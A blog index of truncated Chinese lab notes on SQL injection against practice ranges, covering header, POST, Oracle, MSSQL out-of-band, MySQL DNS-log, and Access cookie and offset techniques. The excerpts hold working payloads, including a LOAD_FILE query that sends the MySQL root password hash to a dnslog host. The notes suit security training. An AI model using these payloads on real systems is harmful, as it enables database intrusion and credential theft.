纯情 Header注入Rank 1-3
打开靶场链接1.headre注入 先登录账号密码zkz查询返回信息Your User Agent is: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 得到数据。在这里我这使用了火狐浏览器插件hack 尝试在User Agent中注入 uname=zkz&passwd=zkz&
纯情 Post注入Rank1-3笔记
打开靶场网址1.先在表单Username和Passwrod编辑框输入zkz,点登录查看返回状态 在看万能密码的返回状态'or 1=1#在用1' order by 10# 查询数据库返回结果的字段 最终试为1' order by 2# 2个字段然后查询当前数据库名1' union select 1,database()#  
纯情 Oracle注入笔记
打开靶场链接http://o1.lab.aqlab.cn:81http://o1.lab.aqlab.cn:81/?id=1' 注意闭合CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))去查询关于主题的对应关键词 去查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况
纯情 MSSQL注入 - 反弹注入
打开靶场 http://120.203.13.75:8150/MSSQL/?id=2利用老师提供的 免费空间服务器网站 创了一个MSSQL数据库服务器:SQL5006.webweb.com数据库名称:DB_14A5E44_zkaq登入帐号:DB_14A5E44_zkaq_admin密码:123123123创数据库表CREATE table test(id int,name char(255)
纯情 MYSQL 注入 - Dns注入
打开靶场链接http://120.203.13.75:8120/index3.php 利用http://ceye.io 免费的dnslog平台 注册账号SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.p
纯情 MYSQL 注入 - 全方位利用
打开靶场链接http://120.203.13.75:6815找到注入点http://120.203.13.75:6815/?id=1 http://120.203.13.75:6815/?id=1 and1=1 正常 and1=2 不正常 判断字段order by 2 正常 order by 3 不正常这个我们 and 1=2 union select 1,
纯情 Access注入 — Cookie注入笔记
打开靶场 http://120.203.13.75:8001找到注入点http://120.203.13.75:8001/shownews.asp?id=171在参数id后面加上分号' 测试,发现对GET请求参数有做过滤:下面使用Firefox的HackBar插件尝试在cookie里进行注入首先将参数id=171放到cookie,然后点击Execute,发现页面依旧正常显示,此时,再将Co
纯情 Access注入 — 偏移注入笔记
打开靶场http://120.203.13.75:8001http://120.203.13.75:8001/ProductShow.asp?ID=105 找到注入位置F12 注入的时候链接不带?ID=105 回车 刷新就可以了document.cookie="id="+escape("105");document.co